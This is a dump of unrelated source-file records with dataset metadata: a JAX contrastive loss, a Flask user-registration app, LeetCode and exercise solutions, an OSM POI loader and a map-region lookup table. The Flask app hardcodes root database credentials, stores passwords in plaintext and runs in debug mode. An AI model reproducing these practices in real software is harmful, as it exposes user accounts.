] | 15 | 2021-09-19T02:20:03.000Z | 2022-03-10T03:00:23.000Z | import jax.numpy as jnp
from jax import lax
import optax
import chex
def _onehot(labels: chex.Array, num_classes: int) -> chex.Array:
x = labels[..., None] == jnp.arange(num_classes).reshape((1,) * labels.ndim + (-1,))
x = lax.select(x, jnp.ones(x.shape), jnp.zeros(x.shape))
return x.astype(jnp.float32)
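`_onehot` builds one-hot rows by broadcasting an equality test between the labels and an `arange` of class ids; the same logic without JAX, for illustration only:

```python
def onehot(labels, num_classes):
    # Row y has a 1.0 in column y and 0.0 elsewhere -- a stdlib
    # equivalent of the broadcasted comparison in _onehot above.
    return [[1.0 if c == y else 0.0 for c in range(num_classes)] for y in labels]

print(onehot([0, 2], 3))  # [[1.0, 0.0, 0.0], [0.0, 0.0, 1.0]]
```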
def p_contrastive_loss(ss: chex.Array, tt: chex.Array, axis: str = 'device') -> chex.Array:
per_shard_targets = tt.shape[0]
per_sample_targets = int(tt.shape[0] / ss.shape[0])
labels = jnp.arange(0, per_shard_targets, per_sample_targets) + per_shard_targets * lax.axis_index(axis)
tt = lax.all_gather(tt, axis).reshape((-1, ss.shape[-1]))
scores = jnp.dot(ss, jnp.transpose(tt))
return optax.softmax_cross_entropy(scores, _onehot(labels, scores.shape[-1]))
| 36.545455 | 108 | 0.690299 | 129 | 804 | 4.147287 | 0.395349 | 0.084112 | 0.084112 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016058 | 0.14801 | 804 | 21 | 109 | 38.285714 | 0.764964 | 0 | 0 | 0 | 0 | 0 | 0.007463 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.266667 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
22915424775bb0c1cd95df8d2deeb30cca4451ba | 1,845 | py | Python | python_test.py | jackKiZhu/mypython | 43eac97bec07338ed3b8b9473d4e4fae26f7140c | [
"MIT"
] | null | null | null | python_test.py | jackKiZhu/mypython | 43eac97bec07338ed3b8b9473d4e4fae26f7140c | [
"MIT"
] | null | null | null | python_test.py | jackKiZhu/mypython | 43eac97bec07338ed3b8b9473d4e4fae26f7140c | [
"MIT"
] | null | null | null | from flask import Flask, render_template, request
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = "mysql://root:mysql@127.0.0.1:3306/python_github"
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = True
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_name = db.Column(db.String(64), unique=True)
user_password = db.Column(db.String(32))
def __repr__(self):
return "user id: %s username: %s" % (self.id, self.user_name)
@app.route("/", methods=["post", "get"])
def index():
index_meg = ""
if request.method == "POST":
user_name = request.form.get("user_name", "")
user_pwd = request.form.get("user_pwd", "")
if not all([user_name, user_pwd]):
index_meg = "Please enter valid information"
else:
print(request.get_data())
user_name_exists = User.query.filter(User.user_name == user_name).first()
if user_name_exists:
index_meg = "Username already exists"
else:
user_obj = User(user_name=user_name, user_password=user_pwd)
db.session.add(user_obj)
db.session.commit()
index_meg = "Registration successful"
print("Registration successful")
# user_name = request.args.get("user_name", "")
# user_pwd = request.args.get("user_pwd", "")
# user_is_login = User.query.filter_by(user_name=user_name, user_password=user_pwd).first()
# if user_is_login:
# index_meg = "Login successful"
# print("Login successful")
# return render_template("login_ok.html", index_meg=index_meg)
# else:
# # index_meg = "Login failed"
# print("Login failed")
return render_template("index.html", index_meg=index_meg)
if __name__ == "__main__":
db.drop_all()
db.create_all()
app.run(debug=True)
| 32.368421 | 95 | 0.614634 | 245 | 1,845 | 4.318367 | 0.338776 | 0.113422 | 0.090737 | 0.042533 | 0.173913 | 0.113422 | 0.066163 | 0.066163 | 0 | 0 | 0 | 0.010036 | 0.243902 | 1,845 | 56 | 96 | 32.946429 | 0.748387 | 0.190244 | 0 | 0.055556 | 0 | 0 | 0.12289 | 0.067522 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0.055556 | 0.055556 | 0.027778 | 0.277778 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
2293c25414f578bb3829ecd6692177ce5d098784 | 1,218 | py | Python | python/tree/0103_binary_tree_zigzag_level_order_traversal.py | linshaoyong/leetcode | ea052fad68a2fe0cbfa5469398508ec2b776654f | [
"MIT"
] | 6 | 2019-07-15T13:23:57.000Z | 2020-01-22T03:12:01.000Z | python/tree/0103_binary_tree_zigzag_level_order_traversal.py | linshaoyong/leetcode | ea052fad68a2fe0cbfa5469398508ec2b776654f | [
"MIT"
] | null | null | null | python/tree/0103_binary_tree_zigzag_level_order_traversal.py | linshaoyong/leetcode | ea052fad68a2fe0cbfa5469398508ec2b776654f | [
"MIT"
] | 1 | 2019-07-24T02:15:31.000Z | 2019-07-24T02:15:31.000Z | class TreeNode(object):
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None


class Solution(object):
    def zigzagLevelOrder(self, root):
        """
        :type root: TreeNode
        :rtype: List[List[int]]
        """
        if not root:
            return []
        a = [root]
        b = []
        c = []
        r = [[root.val]]
        i = 1
        while True:
            for n in a:
                if n.left:
                    b.append(n.left)
                    c.append(n.left.val)
                if n.right:
                    b.append(n.right)
                    c.append(n.right.val)
            if not b:
                break
            else:
                a = b
                if i & 1 == 1:
                    c.reverse()
                r.append(c)
                b = []
                c = []
                i += 1
        return r


def test_zigzag_level_order():
    a = TreeNode(3)
    b = TreeNode(9)
    c = TreeNode(20)
    d = TreeNode(15)
    e = TreeNode(7)
    a.left = b
    a.right = c
    c.left = d
    c.right = e
    assert Solution().zigzagLevelOrder(a) == [
        [3],
        [20, 9],
        [15, 7]
    ]
| 21 | 46 | 0.374384 | 136 | 1,218 | 3.301471 | 0.352941 | 0.062361 | 0.035635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03005 | 0.50821 | 1,218 | 57 | 47 | 21.368421 | 0.719533 | 0.036125 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020833 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.145833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
229f21bdd7be594d33b1093f3cb181d2690aa326 | 3,714 | py | Python | pyroute/poi_osm.py | ftrimble/route-grower | d4343ecc9b13a3e1701c8460c8a1792d08b74567 | [
"Apache-2.0"
] | null | null | null | pyroute/poi_osm.py | ftrimble/route-grower | d4343ecc9b13a3e1701c8460c8a1792d08b74567 | [
"Apache-2.0"
] | null | null | null | pyroute/poi_osm.py | ftrimble/route-grower | d4343ecc9b13a3e1701c8460c8a1792d08b74567 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
#----------------------------------------------------------------
# OSM POI handler for pyroute
#
#------------------------------------------------------
# Copyright 2007, Oliver White
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#------------------------------------------------------
from xml.sax import make_parser, handler
from poi_base import *
import os
from xml.sax._exceptions import SAXParseException
import urllib
class osmPoiModule(poiModule, handler.ContentHandler):
    def __init__(self, modules):
        poiModule.__init__(self, modules)
        self.draw = False
        self.loadPOIs("all", "amenity|shop=*")

    def loadPOIs(self, name, search):
        filename = os.path.join(os.path.dirname(__file__),
                                "data", "poi_%s.osm" % name)
        url = "http://www.informationfreeway.org/api/0.5/node[%s][%s]" % (search,
                                                                          self.bbox())
        if not os.path.exists(filename):
            print "Downloading POIs from OSM"
            urllib.urlretrieve(url, filename)
        self.load(filename, os.path.join(os.path.dirname(__file__),
                                         "Setup", "poi.txt"))

    def bbox(self):
        # TODO: based on location!
        return "bbox=-6,48,2.5,61"

    def load(self, filename, listfile):
        self.filters = []
        print "Loading POIs from %s" % listfile
        f = open(listfile, "r")
        try:
            for line in f:
                if len(line) > 1:
                    text = line.rstrip()
                    name, filter = text.split('|')
                    group = poiGroup(name)
                    self.groups.append(group)
                    self.filters.append({'name': name, 'filter': filter, 'group': group})
        finally:
            f.close()
        if not os.path.exists(filename):
            print "Can't load %s" % filename
            return
        elif not os.path.getsize(filename):
            print "%s is empty" % filename
        self.inNode = False
        parser = make_parser()
        parser.setContentHandler(self)
        try:
            parser.parse(filename)
        except SAXParseException:
            print "Error while parsing file"
            # TODO: what should happen now?

    def startElement(self, name, attrs):
        if name == "node":
            self.currentNode = {
                'lat': float(attrs.get('lat')),
                'lon': float(attrs.get('lon'))}
            self.inNode = True
        if name == "tag" and self.inNode:
            self.currentNode[attrs.get('k')] = attrs.get('v')

    def endElement(self, name):
        if name == "node":
            self.storeNode(self.currentNode)
            self.inNode = False

    def passesFilter(self, n, f):
        parts = f.split(';')
        matched = True
        for part in parts:
            k, v = part.split('=', 1)
            if n.get(k, '') != v:
                matched = False
        return matched

    def storeNode(self, n):
        for f in self.filters:
            if self.passesFilter(n, f['filter']):
                x = poi(n['lat'], n['lon'])
                x.title = n.get('amenity', '') + ': ' + n.get('name', '?')
                # print "%s matches %s" % (x.title, f['name'])
                f['group'].items.append(x)

    def save(self):
        # Default filename if none was loaded
        if self.filename is None:
            self.filename = os.path.join(os.path.dirname(__file__),
                                         "data", "poi.osm")
        self.saveAs(self.filename)

    def saveAs(self, filename):
        if filename is None:
            return


if __name__ == "__main__":
    nodes = osmPoiModule(None)
    nodes.sort({'valid': True, 'lat': 51.3, 'lon': -0.2})
    # nodes.report()
| 29.244094 | 74 | 0.630856 | 510 | 3,714 | 4.529412 | 0.398039 | 0.023377 | 0.016883 | 0.024675 | 0.112987 | 0.101732 | 0.077489 | 0.051515 | 0.036364 | 0.036364 | 0 | 0.006881 | 0.178244 | 3,714 | 126 | 75 | 29.47619 | 0.75 | 0.270328 | 0 | 0.093023 | 0 | 0 | 0.116201 | 0 | 0 | 0 | 0 | 0.007937 | 0 | 0 | null | null | 0.034884 | 0.05814 | null | null | 0.05814 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22a26cac9546e3d04238eea2e14e595751d5270c | 11,429 | py | Python | geo_regions.py | saeed-moghimi-noaa/Maxelev_plot | 5bb701d8cb7d64db4c89ea9d7993a8269e57e504 | [
"CC0-1.0"
] | null | null | null | geo_regions.py | saeed-moghimi-noaa/Maxelev_plot | 5bb701d8cb7d64db4c89ea9d7993a8269e57e504 | [
"CC0-1.0"
] | null | null | null | geo_regions.py | saeed-moghimi-noaa/Maxelev_plot | 5bb701d8cb7d64db4c89ea9d7993a8269e57e504 | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Geo regions for map plot
"""
__author__ = "Saeed Moghimi"
__copyright__ = "Copyright 2017, UCAR/NOAA"
__license__ = "GPL"
__version__ = "1.0"
__email__ = "moghimis@gmail.com"
import matplotlib.pyplot as plt
from collections import defaultdict
defs = defaultdict(dict)
defs['elev']['var'] = 'elev'
defs['elev']['vmin'] = -1
defs['elev']['vmax'] = 1
defs['elev']['label'] = 'Elev. [m]'
defs['elev']['format']= '%3.1g'
defs['elev']['cmap'] = plt.cm.jet_r
def get_region_extent(region='hsofs_region'):
    if region == 'hsofs_region':
        defs['lim']['xmin'] = -99.0
        defs['lim']['xmax'] = -52.8
        defs['lim']['ymin'] = 5.0
        defs['lim']['ymax'] = 46.3
    ## IKE
    elif region == 'caribbean':
        defs['lim']['xmin'] = -78.
        defs['lim']['xmax'] = -74.
        defs['lim']['ymin'] = 20.
        defs['lim']['ymax'] = 24.
        defs['lim']['xmin'] = -82.
        defs['lim']['xmax'] = -71.
        defs['lim']['ymin'] = 18.
        defs['lim']['ymax'] = 26.
    elif region == 'ike_region':
        defs['lim']['xmin'] = -98.5
        defs['lim']['xmax'] = -84.5
        defs['lim']['ymin'] = 24.
        defs['lim']['ymax'] = 31.5
    elif region == 'caribbean_bigger':
        defs['lim']['xmin'] = -78.0
        defs['lim']['xmax'] = -58
        defs['lim']['ymin'] = 10.0
        defs['lim']['ymax'] = 28.
    elif region == 'ike_local':
        defs['lim']['xmin'] = -96
        defs['lim']['xmax'] = -92
        defs['lim']['ymin'] = 28.5
        defs['lim']['ymax'] = 30.6
    elif region == 'ike_wave':
        defs['lim']['xmin'] = -95.63
        defs['lim']['xmax'] = -88.0
        defs['lim']['ymin'] = 28.37
        defs['lim']['ymax'] = 30.50
    elif region == 'ike_hwm':
        defs['lim']['xmin'] = -96.15
        defs['lim']['xmax'] = -88.5
        defs['lim']['ymin'] = 28.45
        defs['lim']['ymax'] = 30.7
    elif region == 'ike_galv_bay':
        defs['lim']['xmin'] = -95.92
        defs['lim']['xmax'] = -94.81
        defs['lim']['ymin'] = 29.37
        defs['lim']['ymax'] = 29.96
    elif region == 'ike_galv_nwm':
        defs['lim']['xmin'] = -95.4
        defs['lim']['xmax'] = -94.2
        defs['lim']['ymin'] = 28.66
        defs['lim']['ymax'] = 30.4
    elif region == 'ike_wav_break':
        defs['lim']['xmin'] = -95
        defs['lim']['xmax'] = -94.5
        defs['lim']['ymin'] = 28.7 + 0.6
        defs['lim']['ymax'] = 30.4 - 0.6
    elif region == 'ike_f63_timeseries':
        defs['lim']['xmin'] = -94.2579 - 0.1
        defs['lim']['xmax'] = -94.2579 + 0.1
        defs['lim']['ymin'] = 29.88642 - 0.1
        defs['lim']['ymax'] = 29.88642 + 0.1
    elif region == 'ike_f63_timeseries_det':
        defs['lim']['xmin'] = -94.2300
        defs['lim']['xmax'] = -94.1866
        defs['lim']['ymin'] = 29.82030
        defs['lim']['ymax'] = 29.84397 + 0.05
    elif region == 'ike_cpl_paper':
        defs['lim']['xmin'] = -95.127481
        defs['lim']['xmax'] = -93.233053
        defs['lim']['ymin'] = 29.198490
        defs['lim']['ymax'] = 30.132224
    ## IRMA
    elif region == 'carib_irma':
        defs['lim']['xmin'] = -84.0
        defs['lim']['xmax'] = -60.
        defs['lim']['ymin'] = 15.0
        defs['lim']['ymax'] = 29.
    elif region == 'burbuda':
        defs['lim']['xmin'] = -65.0
        defs['lim']['xmax'] = -60.
        defs['lim']['ymin'] = 15.0
        defs['lim']['ymax'] = 19.
    elif region == 'burbuda_zoom':
        defs['lim']['xmin'] = -63.8
        defs['lim']['xmax'] = -60.8
        defs['lim']['ymin'] = 16.8
        defs['lim']['ymax'] = 18.65
    elif region == 'puertorico':
        defs['lim']['xmin'] = -67.35
        defs['lim']['xmax'] = -66.531
        defs['lim']['ymin'] = 18.321
        defs['lim']['ymax'] = 18.674
    elif region == 'puertorico_shore':
        defs['lim']['xmin'] = -67.284
        defs['lim']['xmax'] = -66.350
        defs['lim']['ymin'] = 18.360
        defs['lim']['ymax'] = 18.890
    elif region == 'key_west':
        defs['lim']['xmin'] = -82.7
        defs['lim']['xmax'] = -74.5
        defs['lim']['ymin'] = 21.3
        defs['lim']['ymax'] = 27.2
    elif region == 'key_west_zoom':
        defs['lim']['xmin'] = -82.2
        defs['lim']['xmax'] = -79.4
        defs['lim']['ymin'] = 24.1
        defs['lim']['ymax'] = 26.1
    elif region == 'cuba_zoom':
        defs['lim']['xmin'] = -82.
        defs['lim']['xmax'] = -77.
        defs['lim']['ymin'] = 21.5
        defs['lim']['ymax'] = 23.5
    elif region == 'key_west_timeseries':
        defs['lim']['xmin'] = -84.62
        defs['lim']['xmax'] = -79.2
        defs['lim']['ymin'] = 23.6
        defs['lim']['ymax'] = 30.0
    elif region == 'pr_timeseries':
        defs['lim']['xmin'] = -68
        defs['lim']['xmax'] = -64
        defs['lim']['ymin'] = 17.3
        defs['lim']['ymax'] = 19.2
    elif region == 'key_west_anim':
        defs['lim']['xmin'] = -85.5
        defs['lim']['xmax'] = -74.5
        defs['lim']['ymin'] = 21.0
        defs['lim']['ymax'] = 31.5
    ## ISABEL
    elif region == 'isa_region':
        defs['lim']['xmin'] = -80.2
        defs['lim']['xmax'] = -71.6
        defs['lim']['ymin'] = 31.9
        defs['lim']['ymax'] = 41.9
    elif region == 'isa_local':
        defs['lim']['xmin'] = -77.5
        defs['lim']['xmax'] = -74
        defs['lim']['ymin'] = 34.5
        defs['lim']['ymax'] = 40.0
        defs['lim']['xmin'] = -78.5
        defs['lim']['xmax'] = -74
        defs['lim']['ymin'] = 33.5
        defs['lim']['ymax'] = 39.5
    elif region == 'isa_hwm':
        defs['lim']['xmin'] = -76.01
        defs['lim']['xmax'] = -75.93
        defs['lim']['ymin'] = 36.74
        defs['lim']['ymax'] = 36.93
    elif region == 'isa_landfall':
        defs['lim']['xmin'] = -77.8
        defs['lim']['xmax'] = -75.2
        defs['lim']['ymin'] = 34.2
        defs['lim']['ymax'] = 37.5
    elif region == 'isa_landfall_zoom':
        defs['lim']['xmin'] = -77.8
        defs['lim']['xmax'] = -75.2
        defs['lim']['ymin'] = 34.2
        defs['lim']['ymax'] = 36.0
    ## SANDY
    elif region == 'san_track':
        defs['lim']['xmin'] = -82.0
        defs['lim']['xmax'] = -67.0
        defs['lim']['ymin'] = 23.0
        defs['lim']['ymax'] = 43.6
    elif region == 'san_area':
        defs['lim']['xmin'] = -77.0
        defs['lim']['xmax'] = -70.0
        defs['lim']['ymin'] = 37.0
        defs['lim']['ymax'] = 42.0
    elif region == 'san_track':
        defs['lim']['xmin'] = -82.0
        defs['lim']['xmax'] = -67.0
        defs['lim']['ymin'] = 23.0
        defs['lim']['ymax'] = 43.6
    elif region == 'san_area':
        defs['lim']['xmin'] = -77.0
        defs['lim']['xmax'] = -70.0
        defs['lim']['ymin'] = 37.0
        defs['lim']['ymax'] = 42.0
    elif region == 'san_area2':
        defs['lim']['xmin'] = -75.9
        defs['lim']['xmax'] = -73.3
        defs['lim']['ymin'] = 38.5
        defs['lim']['ymax'] = 41.3
    elif region == 'san_newyork':
        defs['lim']['xmin'] = -74.5
        defs['lim']['xmax'] = -73.55
        defs['lim']['ymin'] = 40.35
        defs['lim']['ymax'] = 41.2
    elif region == 'san_delaware':
        defs['lim']['xmin'] = -75.87
        defs['lim']['xmax'] = -74.31
        defs['lim']['ymin'] = 38.26
        defs['lim']['ymax'] = 40.51
    elif region == 'san_jamaica_bay':
        defs['lim']['xmin'] = -73.963520
        defs['lim']['xmax'] = -73.731455
        defs['lim']['ymin'] = 40.518074
        defs['lim']['ymax'] = 40.699618
    elif region == 'irn_region':
        defs['lim']['xmin'] = -78.41
        defs['lim']['xmax'] = -73.48
        defs['lim']['ymin'] = 33.55
        defs['lim']['ymax'] = 41.31
    elif region == 'irn_hwm':
        defs['lim']['xmin'] = -78.64
        defs['lim']['xmax'] = -69.54
        defs['lim']['ymin'] = 33.80
        defs['lim']['ymax'] = 41.82
    ## ANDREW
    elif region == 'and_region':
        defs['lim']['xmin'] = -98.5
        defs['lim']['xmax'] = -77.5
        defs['lim']['ymin'] = 23.
        defs['lim']['ymax'] = 32.
    elif region == 'and_fl_lu':
        defs['lim']['xmin'] = -98.5
        defs['lim']['xmax'] = -76.5
        defs['lim']['ymin'] = 21.
        defs['lim']['ymax'] = 32.
    elif region == 'and_local_lu':
        defs['lim']['xmin'] = -95
        defs['lim']['xmax'] = -86
        defs['lim']['ymin'] = 28.
        defs['lim']['ymax'] = 32
    elif region == 'and_local_fl':
        defs['lim']['xmin'] = -86
        defs['lim']['xmax'] = -79.5
        defs['lim']['ymin'] = 24.
        defs['lim']['ymax'] = 34
    elif region == 'and_local_lu_landfall':
        defs['lim']['xmin'] = -92.4
        defs['lim']['xmax'] = -87.5
        defs['lim']['ymin'] = 28.
        defs['lim']['ymax'] = 31.
    elif region == 'and_local_fl_landfall':
        defs['lim']['xmin'] = -80.0
        defs['lim']['xmax'] = -80.5
        defs['lim']['ymin'] = 25.34
        defs['lim']['ymax'] = 25.8
    ## operational upgrade
    # NYC area: -74.027725,40.596099
    elif region == 'NYC_area':
        defs['lim']['xmin'] = -74.027725 - 0.25
        defs['lim']['xmax'] = -74.027725 + 0.25
        defs['lim']['ymin'] = 40.596099 - 0.2
        defs['lim']['ymax'] = 40.596099 + 0.2
    # Tampa area: -82.455511,27.921438
    elif region == 'Tampa_area':
        defs['lim']['xmin'] = -82.455511 - 0.25
        defs['lim']['xmax'] = -82.455511 + 0.25
        defs['lim']['ymin'] = 27.921438 - 0.2
        defs['lim']['ymax'] = 27.921438 + 0.2
    # Marshall Islands: 169.107299,7.906637
    elif region == 'Marshall':
        defs['lim']['xmin'] = 169.107299 - 0.25
        defs['lim']['xmax'] = 169.107299 + 0.25
        defs['lim']['ymin'] = 7.906637 - 0.2
        defs['lim']['ymax'] = 7.906637 + 0.2
    # Palau: 134.461436,7.436438
    elif region == 'Palau':
        defs['lim']['xmin'] = 134.461436 - 0.25
        defs['lim']['xmax'] = 134.461436 + 0.25
        defs['lim']['ymin'] = 7.436438 - 0.2
        defs['lim']['ymax'] = 7.436438 + 0.2
    elif region == 'NYC_Area_m':
        defs['lim']['xmin'] = -73.55
        defs['lim']['xmax'] = -74.26
        defs['lim']['ymin'] = 40.55
        defs['lim']['ymax'] = 40.91
    elif region == 'Tampa_Area_m':
        defs['lim']['xmin'] = -82.37
        defs['lim']['xmax'] = -82.75
        defs['lim']['ymin'] = 27.63
        defs['lim']['ymax'] = 28.05
    elif region == 'Marshall_Islands_m':
        defs['lim']['xmin'] = 164.92
        defs['lim']['xmax'] = 173.45
        defs['lim']['ymin'] = 5.10
        defs['lim']['ymax'] = 11.90
    elif region == 'Palau_m':
        defs['lim']['xmin'] = 134.01
        defs['lim']['xmax'] = 134.78
        defs['lim']['ymin'] = 6.78
        defs['lim']['ymax'] = 8.52
    elif region == 'Port_Arthur_m':
        defs['lim']['xmin'] = -93.60
        defs['lim']['xmax'] = -94.24
        defs['lim']['ymin'] = 29.62
        defs['lim']['ymax'] = 30.14
    return defs['lim']
| 34.116418 | 52 | 0.441683 | 1,473 | 11,429 | 3.361847 | 0.157502 | 0.318053 | 0.124394 | 0.024233 | 0.30937 | 0.240913 | 0.197294 | 0.160339 | 0.122577 | 0.099152 | 0 | 0.125334 | 0.313063 | 11,429 | 334 | 53 | 34.218563 | 0.505413 | 0.021262 | 0 | 0.166667 | 0 | 0 | 0.209031 | 0.005734 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003401 | false | 0 | 0.006803 | 0 | 0.013605 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22a96894a0336c7d7df8e78f4c4c6ea30cbd0530 | 1,507 | py | Python | microservices/validate/tools/validates.py | clodonil/pipeline_aws_custom | 8ca517d0bad48fe528461260093f0035f606f9be | [
"Apache-2.0"
] | null | null | null | microservices/validate/tools/validates.py | clodonil/pipeline_aws_custom | 8ca517d0bad48fe528461260093f0035f606f9be | [
"Apache-2.0"
] | null | null | null | microservices/validate/tools/validates.py | clodonil/pipeline_aws_custom | 8ca517d0bad48fe528461260093f0035f606f9be | [
"Apache-2.0"
] | null | null | null | """
Tools to validate the template file received from SQS
"""
import yaml


class Validate:
    def __init__(self):
        pass

    def check_validate_yml(self, template):
        """
        Validates whether the yml file is valid
        """
        if template:
            return True
        else:
            return False

    def check_yml_struct(self, template):
        """
        Validates whether the yml structure is valid
        """
        if template:
            return True
        else:
            return False

    def check_template_exist(self, template):
        """
        Validates whether the template specified in the yml file exists
        """
        if template:
            return True
        else:
            return False

    def check_callback_protocol_endpoint(self, template):
        """
        Validates whether the protocol and endpoint are valid
        """
        return True

    def check_template(self, template):
        if self.check_validate_yml(template) \
                and self.check_yml_struct(template) \
                and self.check_template_exist(template) \
                and self.check_callback_protocol_endpoint(template):
            msg = {"status": True}
            return msg
        else:
            msg = {'status': False, 'message': 'problem in the yml file'}
            return msg


def change_yml_to_json(content):
    try:
        template_json = yaml.safe_load(content)
        return template_json
    except yaml.YAMLError as error:
        return {"message": str(error)}
| 25.542373 | 73 | 0.568016 | 166 | 1,507 | 4.981928 | 0.349398 | 0.048368 | 0.065296 | 0.072551 | 0.230955 | 0.180169 | 0.180169 | 0.180169 | 0.180169 | 0.128174 | 0 | 0 | 0.357664 | 1,507 | 58 | 74 | 25.982759 | 0.854339 | 0.147976 | 0 | 0.444444 | 0 | 0 | 0.041385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.194444 | false | 0.027778 | 0 | 0 | 0.527778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
22ac34a9639b610355752302f9ba8f423e657538 | 436 | py | Python | Specialization/Personal/SortHours.py | lastralab/Statistics | 358679f2e749db2e23c655795b34382c84270704 | [
"MIT"
] | 3 | 2017-09-26T20:19:57.000Z | 2020-02-03T16:59:59.000Z | Specialization/Personal/SortHours.py | lastralab/Statistics | 358679f2e749db2e23c655795b34382c84270704 | [
"MIT"
] | 1 | 2017-09-22T13:57:04.000Z | 2017-09-26T20:03:24.000Z | Specialization/Personal/SortHours.py | lastralab/Statistics | 358679f2e749db2e23c655795b34382c84270704 | [
"MIT"
] | 3 | 2018-05-09T01:41:16.000Z | 2019-01-16T15:32:59.000Z | name = "mail.txt"
counts = dict()
handle = open(name)
for line in handle:
    line = line.rstrip()
    if line == '':
        continue
    words = line.split()
    if words[0] == 'From':
        counts[words[5][:2]] = counts.get(words[5][:2], 0) + 1

tlist = list()
for key, value in counts.items():
    newtup = (key, value)
    tlist.append(newtup)
tlist.sort()
for key, value in tlist:
    print key, value
| 18.956522 | 64 | 0.548165 | 60 | 436 | 3.983333 | 0.5 | 0.133891 | 0.058577 | 0.108787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022654 | 0.291284 | 436 | 22 | 65 | 19.818182 | 0.750809 | 0 | 0 | 0 | 0 | 0 | 0.027523 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22ae53d11248d624a0ee5f564b8dd2e374ddaa54 | 606 | py | Python | Day 2/Day_2_Python.py | giTan7/30-Days-Of-Code | f023a2bf1b5e58e1eb5180162443b9cd4b6b2ff8 | [
"MIT"
] | 1 | 2020-10-15T14:44:08.000Z | 2020-10-15T14:44:08.000Z | Day 2/Day_2_Python.py | giTan7/30-Days-Of-Code | f023a2bf1b5e58e1eb5180162443b9cd4b6b2ff8 | [
"MIT"
] | null | null | null | Day 2/Day_2_Python.py | giTan7/30-Days-Of-Code | f023a2bf1b5e58e1eb5180162443b9cd4b6b2ff8 | [
"MIT"
] | null | null | null | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the solve function below.
def solve(meal_cost, tip_percent, tax_percent):
    tip = (meal_cost * tip_percent) / 100
    tax = (meal_cost * tax_percent) / 100
    print(int(meal_cost + tip + tax + 0.5))
    # We add 0.5 because the float should be rounded to the nearest integer


if __name__ == '__main__':
    meal_cost = float(input())
    tip_percent = int(input())
    tax_percent = int(input())

    solve(meal_cost, tip_percent, tax_percent)
# Time complexity: O(1)
# Space complexity: O(1)
